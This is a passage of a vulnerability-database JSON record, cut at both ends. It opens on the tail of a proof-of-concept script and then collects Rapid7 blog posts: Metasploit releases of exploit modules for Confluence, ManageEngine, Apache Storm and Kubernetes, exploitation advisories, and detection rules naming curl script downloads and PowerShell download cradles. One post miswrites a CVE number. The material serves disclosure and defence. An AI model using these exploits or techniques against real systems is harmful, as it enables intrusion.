we_can_execute_cmd(t):\n print(\"(+) executed: %s\" % c)\n\nif __name__ == \"__main__\":\n main()", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://srcincite.io/pocs/src-2020-0011.py.txt"}], "rapid7blog": [{"lastseen": "2021-10-22T15:05:39", "description": "## We just couldn't contain ourselves!\n\n\n\nThis week we've got two Kubernetes modules coming at you from [adfoster-r7](<https://github.com/adfoster-r7>) and [smcintyre-r7](<https://github.com/smcintyre-r7>). First up is an enum module `auxiliary/cloud/kubernetes/enum_kubernetes` that'll extract a variety of information including the namespaces, pods, secrets, service token information, and the Kubernetes environment version! Next is an authenticated code execution module `exploit/multi/kubernetes/exec` (which shipped with a new websocket implementation, too, by the way) that will spin up a new pod with a Meterpreter payload for you provided you have the Kubernetes JWT token and access to the Kubernetes REST API. These modules can even be run through a compromised container that may be running on the Kubernetes cluster.\n\n## Atlassian Confluence WebWork OGNL Injection gets Windows support\n\nYou might remember [Confluence Server CVE-2021-26084](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis?referrer=blog>) making an appearance in a wrap-up last month, and it's back! Rapid7\u2019s own [wvu-r7](<https://github.com/wvu-r7>) has updated his Confluence Server exploit to support Windows targets.\n\n## New module content (2)\n\n * [Kubernetes Enumeration](<https://github.com/rapid7/metasploit-framework/pull/15786>) by Spencer McIntyre and Alan Foster - This adds a module for enumerating Kubernetes environments. It can be run via an established session within a Kubernetes environment or with an authentication token and target information. It will extract a variety of information including the namespaces, pods, secrets and version.\n * [Kubernetes authenticated code execution](<https://github.com/rapid7/metasploit-framework/pull/15733>) by Spencer McIntyre and Alan Foster - Adds a new `exploit/multi/kubernetes/exec` module. It can be run via an established session within a Kubernetes environment or with an authentication token and target information. The module creates a new pod which will execute a Meterpreter payload to open a new session, as well as mounting the host's file system when possible.\n\n## Enhancements and features\n\n * [#15732](<https://github.com/rapid7/metasploit-framework/pull/15732>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- Adds terminal size synchronisation for fully interactive shells against Linux environments with `shell -it`. This functionality is behind a feature flag and can be enabled with `features set fully_interactive_shells true`.\n * [#15769](<https://github.com/rapid7/metasploit-framework/pull/15769>) from [wvu-r7](<https://github.com/wvu-r7>) \\- Added Windows support to the Atlassian Confluence CVE-2021-26084 exploit.\n * [#15773](<https://github.com/rapid7/metasploit-framework/pull/15773>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Adds a collection of useful commands for configuring a local or remote Kubernetes environment to aid with testing and exploring Metasploit's Kubernetes modules and pivoting capabilities. The resource files include deploying two vulnerable applications, and populating secrets which can be extracted and stored as loot, as well as utility commands for creating admin and service account tokens.\n\n## Bugs fixed\n\n * [#15760](<https://github.com/rapid7/metasploit-framework/pull/15760>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Fixes an issue when attempting to store JSON loot, where the extension was always being set to `bin` instead of `json`.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.10...6.1.11](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-10-13T09%3A47%3A12-05%3A00..2021-10-21T11%3A22%3A54-04%3A00%22>)\n * [Full diff 6.1.10...6.1.11](<https://github.com/rapid7/metasploit-framework/compare/6.1.10...6.1.11>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2021-10-22T14:25:55", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-22T14:25:55", "id": "RAPID7BLOG:755102CA788DC2D430C6890A3E9B1040", "href": "https://blog.rapid7.com/2021/10/22/metasploit-wrap-up-135/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-07T15:01:26", "description": "\n\n_This attack is ongoing. See the `Updates` section at the end of this post for new information as it comes to light._\n\nOn August 25, 2021, Atlassian [published details](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) on [CVE-2021-26084](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084/rapid7-analysis?referrer=blog>), a critical remote code execution vulnerability in Confluence Server and Confluence Data Center. The vulnerability arises from an OGNL injection flaw and allows unauthenticated attackers to execute arbitrary code on Confluence Server or Data Center instances. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.\n\nProof-of-concept exploit code has been publicly available since August 31, 2021, and both Rapid7 and community researchers have observed active exploitation as of September 2. **Organizations that have not patched this Confluence Server and Confluence Data Center vulnerability should do so on an emergency basis.**\n\nFor a complete list of fixed versions, see [Atlassian\u2019s advisory here](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>).\n\nFor full vulnerability analysis, including triggers and check information, see [Rapid7\u2019s analysis in AttackerKB](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084/rapid7-analysis?referrer=blog>).\n\n## Rapid7 customers\n\nRapid7's Managed Detection and Response (MDR) team has observed active exploitation against vulnerable Confluence targets. InsightIDR customers should ensure that the Insight Agent is installed on all Confluence servers to maximize post-compromise detection visibility.\n\nInsightVM and Nexpose customers can assess their exposure to [CVE-2021-26084](<https://www.rapid7.com/db/vulnerabilities/atlassian-confluence-cve-2021-26084/>) with remote vulnerability checks as of the August 26, 2021 content release.\n\n## Updates\n\n**September 2, 2021:** \nThe Rapid7 Threat Detection &amp; Response team added or updated the following detections to InsightIDR to help you identify successful exploitation of this vulnerability:\n\n * **Suspicious Process - Curl Downloading Shell Script** detects when the Curl utility is being used to download a shell script. The Curl utility is often used by malicious actors to download additional payloads on compromised Linux systems.\n * **Suspicious Process - Confluence Java App Launching Processes** identifies processes being launched by the Atlassian Confluence server app. Malicious actors have been observed exploiting CVE-2021-26084, a vulnerability for Confluence disclosed in August 2021 which can allow execution of arbitrary processes.\n * **Suspicious Process - Common Compromised Linux Webserver Commands** identifies commands that Rapid7 has observed being run on compromised Linux webservers.\n\n**September 3, 2021:** \nAttacks are continuing to increase, therefore Rapid7 has updated the patching priority to &quot;patch on an emergency basis.&quot;\n\nThe US Cyber Command has tweeted guidance asking for organizations to [&quot;patch immediately&quot;](<https://twitter.com/CNMF_CyberAlert/status/1433787671785185283>) as &quot;this cannot wait until after the weekend.&quot;\n\nCISA has also released a [ransomware awareness guide](<https://us-cert.cisa.gov/ncas/alerts/aa21-243a>) for holidays and weekends.\n\nCurrent attacks have been focused on deploying coin miners, but the pivot to deploying ransomware may not take long.\n\n**September 7, 2021:** \nAtlassian has updated their [advisory on CVE-2021-26084](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) to note that the vulnerability is exploitable by unauthenticated attackers _regardless of configuration._ Widespread exploitation is ongoing.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {}, "published": "2021-09-02T15:44:36", "type": "rapid7blog", "title": "Active Exploitation of Confluence Server & Confluence Data Center: CVE-2021-26084", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-02T15:44:36", "id": "RAPID7BLOG:A94573CD34833AE3602C45D8FAA89AD4", "href": "https://blog.rapid7.com/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-10T09:08:01", "description": "\n\nOver the weekend of November 6, 2021, Rapid7\u2019s Incident Response (IR) and Managed Detection and Response (MDR) teams began seeing opportunistic exploitation of two unrelated CVEs:\n\n * CVE-2021-40539, a REST API authentication bypass in Zoho\u2019s ManageEngine ADSelfService Plus product that [Rapid7 has previously analyzed](<https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis?referrer=blog>). CISA [warned](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/zoho-releases-security-update-adselfservice-plus>) of attackers targeting CVE-2021-40539 in September; the vulnerability allows for unauthenticated remote code execution upon successful exploitation. As of November 8, 2021, Microsoft is [also warning](<https://www.microsoft.com/security/blog/2021/11/08/threat-actor-dev-0322-exploiting-zoho-manageengine-adselfservice-plus/>) that a specific threat actor is targeting vulnerable ManageEngine ADSelfService Plus installations.\n * CVE-2021-42237, a [deserialization vulnerability](<https://attackerkb.com/topics/g2wzJERRtL/cve-2021-42237/rapid7-analysis?referrer=blog>) in the Sitecore Experience Platform that allows for unauthenticated remote code execution [in earlier versions](<https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776>). The affected versions of Sitecore XP appear to be several years old and unsupported other than through extended support contracts. With that said, there seem to be a higher number of organizations with vulnerable installations than expected based on the rate of compromise Rapid7 teams have observed.\n\nAttackers appear to be targeting vulnerabilities with attacks that drop webshells and install coin miners on vulnerable targets. The majority of the compromises Rapid7\u2019s services teams have seen are the result of vulnerable Sitecore instances. Both CVEs are patched; ManageEngine ADSelfService Plus and Sitecore XP customers should prioritize fixes on an urgent basis, without waiting for regularly scheduled patch cycles.\n\n## Rapid7 customers\n\nThe following attacker behavior detections are available to InsightIDR and MDR customers and will alert security teams to webshells and powershell activity related to this attack:\n\n * Webshell - IIS Spawns CMD to Spawn PowerShell\n * Attacker Technique - PowerShell Download Cradle\n\nInsightVM and Nexpose customers can assess their exposure to Zoho ManageEngine CVE-2021-40539 with a [remote vulnerability check](<https://www.rapid7.com/db/vulnerabilities/zoho-manageengine-adselfservice-plus-cve-2021-40539/>). Rapid7 vulnerability researchers have a full technical analysis of this vulnerability [available here](<https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis?referrer=blog>). Our research teams are investigating the feasibility of adding a vulnerability check for Sitecore XP CVE-2021-42237. A technical analysis of this vulnerability is [available here](<https://attackerkb.com/topics/g2wzJERRtL/cve-2021-42237/rapid7-analysis?referrer=blog>).\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {}, "published": "2021-11-09T16:59:41", "type": "rapid7blog", "title": "Opportunistic Exploitation of Zoho ManageEngine and Sitecore CVEs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-40539", "CVE-2021-42237"], "modified": "2021-11-09T16:59:41", "id": "RAPID7BLOG:D84509B01151F59E9152A401D5CF206D", "href": "https://blog.rapid7.com/2021/11/09/opportunistic-exploitation-of-zoho-manageengine-and-sitecore-cves/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-26T19:03:33", "description": "## Self-Service Remote Code Execution\n\n\n\nThis week, our own [@wvu-r7](<https://github.com/wvu-r7>) added an exploit [module](<https://github.com/rapid7/metasploit-framework/pull/15874>) that achieves unauthenticated remote code execution in ManageEngine ADSelfService Plus, a self-service password management and single sign-on solution for Active Directory. This new module leverages a REST API authentication bypass vulnerability identified as [CVE-2021-40539](<https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539?referrer=blog>), where an error in the REST API URL normalization routine makes it possible to bypass security filters and upload arbitrary files on the target. wvu\u2019s new module simply uploads a Java payload to the target and executes it, granting code execution as SYSTEM if ManageEngine ADSelfService Plus was started as a service.\n\n## Storm Alert\n\nWarning, this is not a drill! A critical unauthenticated command injection vulnerability is approaching the Nimbus service component of Apache Storm and has been given the name [CVE-2021-38294](<https://attackerkb.com/topics/xvmqwPRnm5/cve-2021-38294?referrer=blog>). A new exploit [module](<https://github.com/rapid7/metasploit-framework/pull/15866>) authored by our very own [zeroSteiner](<https://github.com/zeroSteiner>) has landed and will exploit this vulnerability to get you OS command execution as the user that started the Nimbus service. Please, evacuate the area immediately!\n\n## Metasploit Community CTF 2021\n\nWe're happy to announce this year\u2019s CTF will start on Friday, December 3, 2021! Similar to last year, the game has been designed to be accessible to beginners who want to learn and connect with the community. Keep in mind that while a team can have unlimited members, only 1,000 team spots are available, and once they\u2019re gone you will have to join someone else\u2019s team. You can find the full details in our [blog post](<https://www.rapid7.com/blog/post/2021/11/16/announcing-the-2021-metasploit-community-ctf/>).\n\n## New module content (2)\n\n * [Apache Storm Nimbus getTopologyHistory Unauthenticated Command Execution](<https://github.com/rapid7/metasploit-framework/pull/15866>) by [Alvaro Mu\u00f1oz](<https://github.com/pwntester>) and [Spencer McIntyre](<https://github.com/zeroSteiner>), which exploits [CVE-2021-38294](<https://attackerkb.com/topics/xvmqwPRnm5/cve-2021-38294?referrer=blog>) \\- This adds an exploit for CVE-2021-38294 which is an unauthenticated remote command execution vulnerability within the `getTopologyHistory()` RPC method that is provided by the Nimbus service which is a component of the Apache Storm project. In order to be exploitable, at least one topology must have been submitted to the Storm cluster. It may be active or inactive but one must be present.\n * [ManageEngine ADSelfService Plus CVE-2021-40539](<https://github.com/rapid7/metasploit-framework/pull/15874>) by [wvu](<https://github.com/wvu-r7>), [Antoine Cervoise](<https://github.com/cervoise>), [Wilfried B\u00e9card](<https://github.com/wilfried-becard>), and [mr_me](<https://github.com/stevenseeley>), which exploits [CVE-2021-40539](<https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539?referrer=blog>) \\- This adds an exploit for CVE-2021-40539 which is an unauthenticated RCE within the ManageEngine ADSelfService application.\n\n## Enhancements and features\n\n * [#15887](<https://github.com/rapid7/metasploit-framework/pull/15887>) from [smashery](<https://github.com/smashery>) \\- The path expansion code has been expanded to support path-based tab completion. Users should now tab-complete things such as `cat ~/some_filenam<tab>`.\n * [#15889](<https://github.com/rapid7/metasploit-framework/pull/15889>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- An update has been made to library code so that terminal resize events are only sent if the Meterpreter client supports it. Additionally, extra feedback is now provided to users on whether or not terminal resizing is handled automatically or if they should adjust it manually.\n * [#15898](<https://github.com/rapid7/metasploit-framework/pull/15898>) from [jmartin-r7](<https://github.com/jmartin-r7>) \\- Ruby 3.x removes support for `URI.encode` and `URI.escape`. This PR replaces uses of these functions in modules with calls to `URI::DEFAULT_PARSER.escape` so that Ruby 3 can run these modules instead of raising errors about missing functions.\n * [#15899](<https://github.com/rapid7/metasploit-framework/pull/15899>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- This improves the user experience when `shell` is invoked from a Meterpreter session. Now, when the `fully_interactive_shells` feature is enabled, a message is displayed to inform the operator that a fully interactive TTY is supported. Note that you can start it by invoking `shell -it`.\n\n## Bugs fixed\n\n * [#15864](<https://github.com/rapid7/metasploit-framework/pull/15864>) from [timwr](<https://github.com/timwr>) \\- A bug has been fixed whereby the `sessions -u` command would not return a x64 Meterpreter session on a x64 Windows host, and would instead return a x86 session. This issue has now been addressed so that `sessions -u` will determine the architecture of the target host prior to upgrading and will generate a new Meterpreter session of the appropriate architecture.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.15...6.1.16](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-11-17T15%3A27%3A48-06%3A00..2021-11-24T18%3A00%3A22-06%3A00%22>)\n * [Full diff 6.1.15...6.1.16](<https://github.com/rapid7/metasploit-framework/compare/6.1.15...6.1.16>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-26T17:21:03", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38294", "CVE-2021-40539"], "modified": "2021-11-26T17:21:03", "id": "RAPID7BLOG:DB7AC7E9278AED114B1BBA8DC96DD124", "href": "https://blog.rapid7.com/2021/11/26/metasploit-wrap-up-140/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-08T15:44:47", "description": "\n\nIn today's post, we're giving a rundown of new features and functionality launched in Q3 2021 for [InsightVM](<https://www.rapid7.com/products/insightvm/>) and the [Insight Platform](<https://www.rapid7.com/products/insight-platform/>). We hope you can begin to leverage these changes to drive success across your organization.\n\n## Apple Silicon support on the Insight Agent\n\nWe're excited to announce that the Insight Agent now natively supports Apple Silicon chips!\n\nApple announced the first generation Apple Silicon chip \u2014 the M1 processor \u2014 in November 2020. This chip is the new standard on all MacBooks starting with the 2020 releases, and Apple plans to transition completely to Apple Silicon chips over the next two years.\n\nThe new Mac installer specifically designed for the Apple Silicon can be accessed right from Agent Management in the platform, in the download section. Learn more in our [Apple Silicon Agent Support blog post](<https://www.rapid7.com/blog/post/2021/07/08/apple-m1-support-on-insight-agent/>).\n\n\n\n## Asset and Vulnerability Details reports\n\nThis new feature allows you to easily communicate details of your assets and vulnerabilities with stakeholders in a PDF format. Simply click the ****Export to PDF ****button on the Vulnerability Details page, and you'll have a PDF ready to share!\n\n\n\nThis is particularly useful if you're attempting to collaborate while remediating a specific vulnerability. We'll use a hypothetical security engineer named Jane to illustrate this.\n\nJane recently read about a new ransomware strain that leverages a specific vulnerability as part of an attack chain that seems to be targeting the industry of her organization. She opens the query builder in InsightVM, constructs a search query to identify the vulnerability by CVE, and discovers several instances. She wants to mention this during her morning all-hands sync so she can recruit other team members to her effort. She exports the vulnerability details page to a PDF, which allows her to share this out and provide more details to interested team members, who then can help her remediate this vulnerability much more quickly.\n\nMoreover, while undertaking this effort, another team member \u2014 Bill \u2014 finds an asset that seems to be a complete tragedy in terms of patching and vulnerability prevalence. He creates the Asset Details report and shares this in an e-mail to his team, stating that this asset seems to be missing their organization's patch cycle. He also suggests that they look for more of these types of assets because he knows that when there is one offender, there are often many.\n\n## Snyk integration for reporting vulnerabilities\n\nContainer Security assessments will now report Ruby vulnerabilities through an integration with the Snyk vulnerability database. This adds RubyGems packages to our Snyk-based coverage, which currently includes vulnerability detections for Java, JavaScript, and Python libraries. This integration is particularly helpful for organizations that perform scanning of Container Images at rest, in both public and private registries.\n\n## Emergent threat coverage recap\n\nQ3 2021 was another busy quarter for high-priority cybersecurity threats. As part of our emergent threat response process, Rapid7's VRM research and engineering teams released vulnerability checks and in-depth technical analysis to help InsightVM customers understand the risk of exploitation and assess their exposure to critical security threats. In July, [CVE-2021-34527](<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare/rapid7-analysis?referrer=blog>), dubbed \u201c[PrintNightmare](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>)\" presented remediation challenges for many organizations amid active exploitation of the Windows Print Spooler service. In August, the [ProxyShell](<https://attackerkb.com/topics/xbr3tcCFT3/proxyshell-exploit-chain/rapid7-analysis?referrer=blog>) exploit chain put on-premises instances of Microsoft Exchange Server [at risk](<https://www.rapid7.com/blog/post/2021/08/12/proxyshell-more-widespread-exploitation-of-microsoft-exchange-servers/>) for remote code execution. More recently, widespread attacks took advantage of [CVE-2021-26084](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis?referrer=blog>), a critical flaw in[ Confluence Server &amp; Confluence Data Center](<https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/>), to deploy cryptominers, exfiltrate data, and obtain initial access for ransomware operations.\n\nOther notable emergent threats included:\n\n * [ForgeRock Access Manager/OpenAM Pre-Auth Remote Code Execution Vulnerability (CVE-2021-35464)](<https://attackerkb.com/topics/KnAX5kffui/pre-auth-rce-in-forgerock-access-manager-cve-2021-35464/rapid7-analysis?referrer=blog>)\n * [SolarWinds Serv-U FTP and Managed File Transfer (CVE-2021-35211)](<https://www.rapid7.com/blog/post/2021/07/12/solarwinds-serv-u-ftp-and-managed-file-transfer-cve-2021-35211-what-you-need-to-know/>)\n * [Microsoft SAM File Readability (CVE-2021-36934)](<https://www.rapid7.com/blog/post/2021/07/21/microsoft-sam-file-readability-cve-2021-36934-what-you-need-to-know/>)\n * [PetitPotam: Novel Attack Chain](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>)\n * [Zoho ManageEngine ADSelfService Plus (CVE-2021-40539)](<https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis?referrer=blog>)\n * [Critical vCenter Server File Upload Vulnerability (CVE-2021-22005)](<https://www.rapid7.com/blog/post/2021/09/21/critical-vcenter-server-file-upload-vulnerability-cve-2021-22005/>)\n\n## Stay tuned!\n\nAs always, we're continuing to work on exciting product enhancements and releases throughout the year. Keep an eye on our blog and [release notes](<https://docs.rapid7.com/release-notes/insightvm/>) as we continue to highlight the latest in vulnerability management at Rapid7.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-10-08T13:30:00", "type": "rapid7blog", "title": "What's New in InsightVM: Q3 2021 in Review", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-22005", "CVE-2021-26084", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35464", "CVE-2021-36934", "CVE-2021-40539"], "modified": "2021-10-08T13:30:00", "id": "RAPID7BLOG:8882BFA669B38BCF7B5A8A26F657F735", "href": "https://blog.rapid7.com/2021/10/08/whats-new-in-insightvm-q3-2021-in-review/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-10T18:59:32", "description": "## Confluence Server OGNL Injection\n\n\n\nOur own [wvu](<https://github.com/wvu-r7>) along with [Jang](<https://twitter.com/testanull>) added a module that exploits an OGNL injection ([CVE-2021-26804](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection>))in Atlassian Confluence's WebWork component to execute commands as the Tomcat user. CVE-2021-26804 is a critical remote code execution vulnerability in Confluence Server and Confluence Data Center and is actively being exploited in the wild. Initial discovery of this exploit was by Benny Jacob (SnowyOwl).\n\n## More Enhancements\n\nIn addition to the module, we would like to highlight some of the enhancements that have been added for this release. Contributor [e2002e](<https://github.com/e2002e>) added the `OUTFILE` and `DATABASE` options to the `zoomeye_search` module allowing users to save results to a local file or local database along with improving the output of the module to provide better information about the target. Our own [dwelch-r7](<https://github.com/dwelch-r7>) has added support for fully interactive shells against Linux environments with `shell -it`. In order to use this functionality, users will have to enable the feature flag with `features set fully_interactive_shells true`. Contributor [pingport80](<https://github.com/pingport80>) has added `powershell` support for `write_file` method that is binary safe and has also replaced explicit `cat` calls with file reads from the file library to provide broader support.\n\n## New module content (1)\n\n * [Atlassian Confluence WebWork OGNL Injection](<https://github.com/rapid7/metasploit-framework/pull/15645>) by [wvu](<https://github.com/wvu-r7>), [Benny Jacob](<https://twitter.com/bennyyjacob>), and [Jang](<https://twitter.com/testanull>), which exploits [CVE-2021-26084](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection?referrer=blog>) \\- This adds an exploit module targeting an OGNL injection vulnerability (CVE-2021-26084) in Atlassian Confluence's WebWork component to execute commands as the Tomcat user.\n\n## Enhancements and features\n\n * [#15278](<https://github.com/rapid7/metasploit-framework/pull/15278>) from [e2002e](<https://github.com/e2002e>) \\- The `zoomeye_search` module has been enhanced to add the `OUTFILE` and `DATABASE` options, which allow users to save results to a local file or to the local database respectively. Additionally the output saved has been improved to provide better information about the target and additional error handling has been added to better handle potential edge cases.\n * [#15522](<https://github.com/rapid7/metasploit-framework/pull/15522>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- Adds support for fully interactive shells against Linux environments with `shell -it`. This functionality is behind a feature flag and can be enabled with `features set fully_interactive_shells true`\n * [#15560](<https://github.com/rapid7/metasploit-framework/pull/15560>) from [pingport80](<https://github.com/pingport80>) \\- This PR add powershell support for write_file method that is binary safe.\n * [#15627](<https://github.com/rapid7/metasploit-framework/pull/15627>) from [pingport80](<https://github.com/pingport80>) \\- This PR removes explicit `cat` calls and replaces them with file reads from the file library so that they have broader support.\n\n## Bugs fixed\n\n * [#15634](<https://github.com/rapid7/metasploit-framework/pull/15634>) from [maikthulhu](<https://github.com/maikthulhu>) \\- This PR fixes an issue in `exploit/multi/misc/erlang_cookie_rce` where a missing bitwise flag caused the exploit to fail in some circumstances.\n * [#15636](<https://github.com/rapid7/metasploit-framework/pull/15636>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Fixes a regression in datastore serialization that caused some event processing to fail.\n * [#15637](<https://github.com/rapid7/metasploit-framework/pull/15637>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Fixes a regression issue were Metasploit incorrectly marked ipv6 address as having an 'invalid protocol'\n * [#15639](<https://github.com/rapid7/metasploit-framework/pull/15639>) from [gwillcox-r7](<https://github.com/gwillcox-r7>) \\- This fixes a bug in the `rename_files` method that would occur when run on a non-Windows shell session.\n * [#15640](<https://github.com/rapid7/metasploit-framework/pull/15640>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Updates `modules/auxiliary/gather/office365userenum.py` to require python3\n * [#15652](<https://github.com/rapid7/metasploit-framework/pull/15652>) from [jmartin-r7](<https://github.com/jmartin-r7>) \\- A missing dependency, `py3-pip`, was preventing certain external modules such as `auxiliary/gather/office365userenum` from working due to `requests` requiring `py3-pip` to run properly. This has been fixed by updating the Docker container to install the missing `py3-pip` dependency.\n * [#15654](<https://github.com/rapid7/metasploit-framework/pull/15654>) from [space-r7](<https://github.com/space-r7>) \\- A bug has been fixed in `lib/msf/core/payload/windows/encrypted_reverse_tcp.rb` whereby a call to `recv()` was not being passed the proper arguments to receive the full payload before returning. This could result in cases where only part of the payload was received before continuing, which would have resulted in a crash. This has been fixed by adding a flag to the `recv()` function call to ensure it receives the entire payload before returning.\n * [#15655](<https://github.com/rapid7/metasploit-framework/pull/15655>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This cleans up the MySQL client-side options that are used within the library code.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.3...6.1.5](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-09-02T10%3A13%3A16-05%3A00..2021-09-08T18%3A07%3A57-05%3A00%22>)\n * [Full diff 6.1.3...6.1.5](<https://github.com/rapid7/metasploit-framework/compare/6.1.3...6.1.5>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": 